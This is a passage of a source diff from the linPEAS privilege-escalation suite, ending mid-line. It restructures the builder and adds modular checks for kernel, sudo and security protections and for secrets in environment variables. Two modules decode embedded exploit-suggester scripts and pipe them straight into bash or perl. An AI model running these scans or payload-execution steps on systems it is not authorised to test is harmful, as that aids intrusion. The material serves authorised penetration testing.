- SUID/SGID common binaries (the bin was already found in other machines and searchsploit doesn't identify any vulnerable version)
- Common .sh files in path
- Common names of users executing processes
- Common cronjobs
+- The ![](https://placehold.it/15/66ff33/000000?text=+) **Green** color is used for known good configurations (based on the name not on the conten!)

-The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for:
- Users without shell
- Mounted devices
+- The ![](https://placehold.it/15/0066ff/000000?text=+) **Blue** color is used for: Users without shell & Mounted devices

-The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for:
- Users with shell
+- The ![](https://placehold.it/15/33ccff/000000?text=+) **Light Cyan** color is used for: Users with shell

-The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for:
- Current username
+- The ![](https://placehold.it/15/bf80ff/000000?text=+) **Light Magenta** color is used for: Current username

 </details>

@@ -218,15 +201,12 @@ Are you a PEASS fan? Get now our merch at **[PEASS Shop](https://teespring.com/s

 ## Collaborate

-If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.
+If you want to help with the TODO tasks or with anything, you can do it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues) or you can submit a pull request**.

-If you find any issue, please report it using **[github issues](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/issues)**.
+If you find any issue, please report it using **[github issues](https://github.com/peass-ng/privilege-escalation-awesome-scripts-suite/issues)**.

 **Linpeas** is being **updated** every time I find something that could be useful to escalate privileges.

 ## Advisory

 All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop<sup>(TM)</sup>
--- a/linPEAS/builder/README.md
+++ b/linPEAS/builder/README.md
@@ -0,0 +1,78 @@
+# Build you own linpeas!
+
+You can **build you own linpeas which will contain only the checks you want**. This is useful to reduce the time it takes to run linpeas and to make linpeas more stealth and modular.
+
+## Quick start building linpeas.sh
+
+It's possible to indicate the params `--all`, `--all-no-fat` and `--small` to build the classic `linpeas_fat.sh`, `linpeas.sh` and `linpeas_small.sh`:
+
+- **linpeas_fat.sh**: Contains all checks, even third party applications in base64 embedded.
+- **linpeas.sh**: Contains all checks, but only the third party application `linux exploit suggester` is embedded. This is the default `linpeas.sh`.
+- **linpeas_small.sh**: Contains only the most *important* checks making its size smaller.
+
+However, in order to indicate only some specific checks, you can use the `--include` and `--exclude` params. These arguments supports a comma separated list of modules to add or remove from the final linpeas. Note that the matchs are done by checking **if the module path string contains any of the words** indicated in those params. Therefore, if you want to inde all the tests from the `linpeas_parts/3_cloud` it's enough to indicate `--include "cloud"`. Or if you want to include only the check `linpeas_parts/3_cloud/1_Check_if_in_Cloud` you can indicate `--include "Check_if_in_Cloud"`.
+
+```bash
+# Run this commands from 1 level above the builder folder. From here: cd ..
+# Build linpeas_fat (linpeas with all checks, even third party applications in base64 embedded)
+python3 -m builder.linpeas_builder --all --output /tmp/linpeas_fat.sh
+
+# Build regular linpeas
+python3 -m builder.linpeas_builder --all-no-fat --output /tmp/linpeas.sh
+
+# Build small linpeas
+python3 -m builder.linpeas_builder --small --output /tmp/linpeas_small.sh
+
+# Build linpeas only with container and cloud checks
+python3 -m builder.linpeas_builder --include "container,cloud" --output /tmp/linpeas_custom.sh
+
+# Build linpeas only with regexes
+python3 -m builder.linpeas_builder --include "api_keys_regex" --output /tmp/linpeas_custom.sh
+
+# Build linpeas only with some specific modules
+## You can customize it as much as you want
+python3 -m builder.linpeas_builder --include "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
+
+# Build linpeas excluding some specific modules
+python3 -m builder.linpeas_builder --exclude "CPU_info,Sudo_version,Clipboard_highlighted_text" --output /tmp/linpeas_custom.sh
+```
+
+## How to add new modules
+
+Adding new modules is very easy. You just need to create a new file in the `linpeas_parts/<corresponding section>` folder with the following structure with the bash code to run. Note that every new module should have some specific metadata at the beggining of the file. This metadata is used by the builder to generate the final linpeas.
+
+Metadata example:
+
+```bash
+# Title: Cloud - Check if in cloud
+# ID: CL_Check_if_in_cloud
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Check if the current system is inside a cloud environment
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_aws_codebuild, check_aws_ec2, check_aws_ecs, check_aws_lambda, check_az_app, check_az_vm, check_do, check_gcp, check_ibm_vm, check_tencent_cvm, print_list
+# Global Variables: $is_aws_codebuild, $is_aws_ecs, $is_aws_ec2, , $is_aws_lambda, $is_az_app, $is_az_vm, $is_do, $is_gcp_vm, $is_gcp_function, $is_ibm_vm, $is_aws_ec2_beanstalk, $is_aliyun_ecs, $is_tencent_cvm
+# Initial Functions: check_gcp, check_aws_ecs, check_aws_ec2, check_aws_lambda, check_aws_codebuild, check_do, check_ibm_vm, check_az_vm, check_az_app, check_aliyun_ecs, check_tencent_cvm
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+<code>
+```
+
+### Metadata parts explained
+
+- **Title**: Title of the module
+- **ID**: Unique identifier of the module. It has to be the same as the filename without the extension and with the section identifier as prefix (in this case `CL`)
+- **Author**: Author of the module
+- **Last Update**: Last update of the module
+- **Description**: Description of the module
+- **License**: License of the module
+- **Version**: Version of the module
+- **Functions Used**: Functions used by the module inside the bash code. If your module is using a function not defined here, linpeas won't be built.
+- **Global Variables**: Global variables used by the module inside the bash code. If your module is using a global variable not defined here, linpeas won't be built.
+- **Initial Functions**: Functions that are called at the beggining of the module. If your module is using a function not defined here, linpeas won't be built.
+- **Generated Global Variables**: Global variables generated (given a relevant value) by the module. If your module is generating a global variable not defined here, linpeas won't be built.
+- **Fat linpeas**: Set only as 1 if the module is loading a third party app, if not 0.
+- **Small linpeas**: Set as 1 if it's a quick check, if not 0.
--- a/linPEAS/builder/linpeas_base.sh
+++ b/linPEAS/builder/linpeas_base.sh
--- a/linPEAS/builder/linpeas_builder.py
+++ b/linPEAS/builder/linpeas_builder.py
@@ -5,29 +5,51 @@ from .src.yamlGlobals import FINAL_FAT_LINPEAS_PATH, FINAL_LINPEAS_PATH, TEMPORA

 import os
 import stat
+import argparse

-#python3 -m builder.linpeas_builder
-def main():
+# python3 -m builder.linpeas_builder
+def main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output):
    # Load configuration
    ploaded = PEASLoaded()

-    # Build temporary  linpeas_base.sh file
-    lbasebuilder = LinpeasBaseBuilder()
+    # Build temporary linpeas_base.sh file
+    lbasebuilder = LinpeasBaseBuilder(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules)
    lbasebuilder.build()

    # Build final linpeas.sh
    lbuilder = LinpeasBuilder(ploaded)
    lbuilder.build()
-    lbuilder.write_linpeas(FINAL_FAT_LINPEAS_PATH)
-    lbuilder.write_linpeas(FINAL_LINPEAS_PATH, rm_startswith="FAT_LINPEAS")
-    os.remove(TEMPORARY_LINPEAS_BASE_PATH) #Remove the built linpeas_base.sh file
+    lbuilder.write_linpeas(output)
+    os.remove(TEMPORARY_LINPEAS_BASE_PATH) # Remove the built linpeas_base_temp.sh file
    
-    st = os.stat(FINAL_FAT_LINPEAS_PATH)
-    os.chmod(FINAL_FAT_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
-    
-    st = os.stat(FINAL_LINPEAS_PATH)
-    os.chmod(FINAL_LINPEAS_PATH, st.st_mode | stat.S_IEXEC)
-
+    st = os.stat(output)
+    os.chmod(output, st.st_mode | stat.S_IEXEC)

 if __name__ == "__main__":
-    main()
+    parser = argparse.ArgumentParser(description='Build you own linpeas.sh')
+    parser.add_argument('--all', action='store_true', help='Build linpeas with all modules (linpeas_fat).')
+    parser.add_argument('--all-no-fat', action='store_true', help='Build linpeas with all modules except fat ones.')
+    parser.add_argument('--no-network-scanning', action='store_true', help='Build linpeas without network scanning.')
+    parser.add_argument('--small', action='store_true', help='Build small version of linpeas.')
+    parser.add_argument('--include', type=str, help='Build linpeas only with the modules indicated you can indicate section names or module IDs).')
+    parser.add_argument('--exclude', type=str, help='Exclude the given modules (you can indicate section names or module IDs).')
+    parser.add_argument('--output', required=True, type=str, help='Parth to write the final linpeas file to.')
+    args = parser.parse_args()
+
+    all_modules = args.all
+    all_no_fat_modules = args.all_no_fat
+    no_network_scanning = args.no_network_scanning
+    small = args.small
+    include_modules = args.include.split(",") if args.include else []
+    include_modules = [m.strip().lower() for m in include_modules]
+    exclude_modules = args.exclude.split(",") if args.exclude else []
+    exclude_modules = [m.strip().lower() for m in exclude_modules]
+    output = args.output
+
+    # If not all, all-no-fat, small or include, exit
+    if not args.all and not args.all_no_fat and not args.small and not args.include:
+        print("You must specify one of the following options: --all, --all-no-fat, --small or --include")
+        parser.print_help()
+        exit(1)
+    
+    main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output)
--- a/linPEAS/builder/linpeas_parts/10_api_keys_regex/regexes.sh
+++ b/linPEAS/builder/linpeas_parts/10_api_keys_regex/regexes.sh
@@ -0,0 +1,20 @@
+# Title: API Keys Regex - Regexes
+# ID: RX_regexes
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Regexes
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, search_for_regex
+# Global Variables: $REGEXES, $TIMEOUT
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
+    peass{REGEXES}
+else
+    echo "Regexes to search for API keys aren't activated, use param '-r' "
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information.sh
@@ -1,101 +0,0 @@
-###########################################
-#-------------) System Info (-------------#
-###########################################
-
-#-- SY) OS
-print_2title "Operative system"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
-(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
-warn_exec lsb_release -a 2>/dev/null
-if [ "$MACPEAS" ]; then
-    warn_exec system_profiler SPSoftwareDataType
-fi
-echo ""
-
-#-- SY) Sudo
-print_2title "Sudo version"
-if [ "$(command -v sudo 2>/dev/null)" ]; then
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
-sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
-else echo_not_found "sudo"
-fi
-echo ""
-
-#--SY) USBCreator
-if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
-    print_2title "USBCreator"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
-
-    pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
-    if [ -z "$pc_version" ]; then
-        pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
-    fi
-    if [ -n "$pc_version" ]; then
-        pc_length=${#pc_version}
-        pc_major=$(echo "$pc_version" | cut -d. -f1)
-        pc_minor=$(echo "$pc_version" | cut -d. -f2)
-        if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor"  -lt 21 ]; then
-            echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
-        fi
-    fi
-fi
-echo ""
-
-#-- SY) PATH
-
-print_2title "PATH"
-print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
-if ! [ "$IAMROOT" ]; then
-    echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
-fi
-
-if [ "$DEBUG" ]; then
-     echo "New path exported: $PATH"
-fi
-echo ""
-
-#-- SY) Date
-print_2title "Date & uptime"
-warn_exec date 2>/dev/null
-warn_exec uptime 2>/dev/null
-echo ""
-
-#-- SY) System stats
-if [ "$EXTRA_CHECKS" ]; then
-    print_2title "System stats"
-    (df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
-    warn_exec free 2>/dev/null
-    echo ""
-fi
-
-#-- SY) CPU info
-if [ "$EXTRA_CHECKS" ]; then
-    print_2title "CPU info"
-    warn_exec lscpu 2>/dev/null
-    echo ""
-fi
-
-if [ -d "/dev" ] || [ "$DEBUG" ] ; then
-    print_2title "Any sd*/disk* disk in /dev? (limit 20)"
-    ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
-    echo ""
-fi
-
-if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
-    print_2title "Unmounted file-system?"
-    print_info "Check if you can mount umounted devices"
-    grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
-    echo ""
-fi
-
-if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
-    print_2title "Mounted disks information"
-    warn_exec diskutil list
-    echo ""
-fi
-
-if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
-    print_2title "Mounted SMB Shares"
-    warn_exec smbutil statshares -a
-    echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/10_Enviroment.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/10_Enviroment.sh
@@ -0,0 +1,19 @@
+# Title: System Information - Enviroment
+# ID: SY_Enviroment
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information inside environment variables
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+print_2title "Environment"
+print_info "Any private information inside environment variables?"
+(env || printenv || set) 2>/dev/null | grep -v "RELEVANT*|FIND*|^VERSION=|dbuslistG|mygroups|ldsoconfdG|pwd_inside_history|kernelDCW_Ubuntu_Precise|kernelDCW_Ubuntu_Trusty|kernelDCW_Ubuntu_Xenial|kernelDCW_Rhel|^sudovB=|^rootcommon=|^mounted=|^mountG=|^notmounted=|^mountpermsB=|^mountpermsG=|^kernelB=|^C=|^RED=|^GREEN=|^Y=|^B=|^NC=|TIMEOUT=|groupsB=|groupsVB=|knw_grps=|sidG|sidB=|sidVB=|sidVB2=|sudoB=|sudoG=|sudoVB=|timersG=|capsB=|notExtensions=|Wfolders=|writeB=|writeVB=|_usrs=|compiler=|PWD=|LS_COLORS=|pathshG=|notBackup=|processesDump|processesB|commonrootdirs|USEFUL_SOFTWARE|PSTORAGE_" | sed -${E} "s,[pP][wW][dD]|[pP][aA][sS][sS][wW]|[aA][pP][iI][kK][eE][yY]|[aA][pP][iI][_][kK][eE][yY]|KRB5CCNAME,${SED_RED},g" || echo_not_found "env || set"
+echo ""
--- a/linPEAS/builder/linpeas_parts/1_system_information/11_Dmesg.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/11_Dmesg.sh
@@ -0,0 +1,21 @@
+# Title: System Information - Dmesg
+# ID: SY_Dmesg
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Searching Signature verification failed in dmesg
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_info
+# Global Variables: $DEBUG
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
+    print_2title "Searching Signature verification failed in dmesg"
+    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed"
+    (dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/12_Macos_os_checks.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/12_Macos_os_checks.sh
@@ -0,0 +1,31 @@
+# Title: System Information - MacOS OS checks
+# ID: SY_Macos_os_checks
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Macos OS checks
+# License: GNU GPL
+# Version: 1.0
+# Functions Used:macosNotSigned, print_2title
+# Global Variables: $MACPEAS
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$MACPEAS" ]; then
+    print_2title "Kernel Extensions not belonging to apple"
+    kextstat 2>/dev/null | grep -Ev " com.apple."
+    echo ""
+
+    print_2title "Unsigned Kernel Extensions"
+    macosNotSigned /Library/Extensions
+    macosNotSigned /System/Library/Extensions
+    echo ""
+fi
+
+if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then
+    print_2title "Brew Doctor Suggestions"
+    brew doctor
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/13_Linux_exploit_suggester.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/13_Linux_exploit_suggester.sh
@@ -0,0 +1,22 @@
+# Title: System Information - Linux Exploit Suggester
+# ID: SY_Linux_exploit_suggester
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Linux Exploit Suggester tool execution
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables: $MACPEAS
+# Initial Functions:
+# Generated Global Variables: $les_b64
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$(command -v bash 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
+    print_2title "Executing Linux Exploit Suggester"
+    print_info "https://github.com/mzet-/linux-exploit-suggester"
+    les_b64="peass{https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh}"
+    echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s/\[(CVE-[0-9]+-[0-9]+,?)+\].*/${SED_RED}/g"
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/14_Linux_exploit_suggester_2.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/14_Linux_exploit_suggester_2.sh
@@ -0,0 +1,22 @@
+# Title: System Information - Linux Exploit Suggester 2 
+# ID: SY_Linux_exploit_suggester_2
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Linux Exploit Suggester 2 tool execution
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables: $les2_b64
+# Fat linpeas: 1
+# Small linpeas: 0
+
+
+if [ "$(command -v perl 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
+    print_2title "Executing Linux Exploit Suggester 2"
+    print_info "https://github.com/jondonas/linux-exploit-suggester-2"
+    les2_b64="peass{https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl}"
+    echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -iE "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/15_Protections.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/15_Protections.sh
@@ -0,0 +1,115 @@
+# Title: System Information - Kernel Extensions
+# ID: SY_Protections
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Kernel Extensions
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: echo_not_found, print_2title, print_list, warn_exec
+# Global Variables:
+# Initial Functions:
+# Generated Global Variables: $ASLR, $hypervisorflag, $detectedvirt
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+#-- SY) AppArmor
+print_2title "Protections"
+print_list "AppArmor enabled? .............. "$NC
+if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then
+    aa-status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(command -v apparmor_status 2>/dev/null || echo -n '')" ]; then
+    apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
+elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
+    ls -d /etc/apparmor*
+else
+    echo_not_found "AppArmor"
+fi
+
+#-- SY) AppArmor2
+print_list "AppArmor profile? .............. "$NC
+(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
+
+#-- SY) LinuxONE
+print_list "is linuxONE? ................... "$NC
+( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
+
+#-- SY) grsecurity
+print_list "grsecurity present? ............ "$NC
+( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
+
+#-- SY) PaX
+print_list "PaX bins present? .............. "$NC
+(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
+
+#-- SY) Execshield
+print_list "Execshield enabled? ............ "$NC
+(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
+
+#-- SY) SElinux
+print_list "SELinux enabled? ............... "$NC
+(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+#-- SY) Seccomp
+print_list "Seccomp enabled? ............... "$NC
+([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+#-- SY) AppArmor
+print_list "User namespace? ................ "$NC
+if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
+
+#-- SY) cgroup2
+print_list "Cgroup2 enabled? ............... "$NC
+([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
+
+#-- SY) Gatekeeper
+if [ "$MACPEAS" ]; then
+    print_list "Gatekeeper enabled? .......... "$NC
+    (spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
+
+    print_list "sleepimage encrypted? ........ "$NC
+    (sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
+
+    print_list "XProtect? .................... "$NC
+    (system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
+
+    print_list "SIP enabled? ................. "$NC
+    csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
+
+    print_list "Sealed Snapshot? ............. "$NC
+    diskutil apfs list | grep "Snapshot Sealed" | awk -F: '{print $2}' | tr -d '[:space:]' | sed "s,Yes,${SED_GREEN}," | sed "s,No,${SED_RED}," || echo_not_found
+
+    print_list "Sealed Snapshot (2nd)? ....... "$NC
+    csrutil authenticated-root status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
+
+
+    print_list "Connected to JAMF? ........... "$NC
+    warn_exec jamf checkJSSConnection
+
+    print_list "Connected to AD? ............. "$NC
+    dsconfigad -show && echo "" || echo_no
+fi
+
+#-- SY) ASLR
+print_list "Is ASLR enabled? ............... "$NC
+ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
+if [ -z "$ASLR" ]; then
+    echo_not_found "/proc/sys/kernel/randomize_va_space";
+else
+    if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
+    echo ""
+fi
+
+#-- SY) Printer
+print_list "Printer? ....................... "$NC
+(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
+
+#-- SY) Running in a virtual environment
+print_list "Is this a virtual machine? ..... "$NC
+hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
+if [ "$(command -v systemd-detect-virt 2>/dev/null || echo -n '')" ]; then
+    detectedvirt=$(systemd-detect-virt)
+    if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
+else
+    if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
+fi
--- a/linPEAS/builder/linpeas_parts/1_system_information/1_Operative_system.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information/1_Operative_system.sh
@@ -0,0 +1,22 @@
+# Title: System Information - Operative System
+# ID: SY_Operative_system
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Get Information about the Operative system
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: print_2title, print_info, warn_exec
+# Global Variables: $MACPEAS, $kernelDCW_Ubuntu_Precise_1, $kernelB, $kernelDCW_Ubuntu_Precise_2, $kernelDCW_Ubuntu_Precise_3, $kernelDCW_Ubuntu_Precise_4, $kernelDCW_Ubuntu_Precise_5, $kernelDCW_Ubuntu_Precise_6, $kernelDCW_Rhel5_1, $kernelDCW_Rhel5_2, $kernelDCW_Rhel5_3, $kernelDCW_Rhel6_1, $kernelDCW_Rhel6_2, $kernelDCW_Rhel6_3, $kernelDCW_Rhel6_4, $kernelDCW_Rhel7, $kernelDCW_Ubuntu_Trusty_1, $kernelDCW_Ubuntu_Trusty_2, $kernelDCW_Ubuntu_Trusty_3, $kernelDCW_Ubuntu_Trusty_4, $kernelDCW_Ubuntu_Xenial
+# Initial Functions:
+# Generated Global Variables:
+# Fat linpeas: 0
+# Small linpeas: 1
+
+print_2title "Operative system"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
+(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} 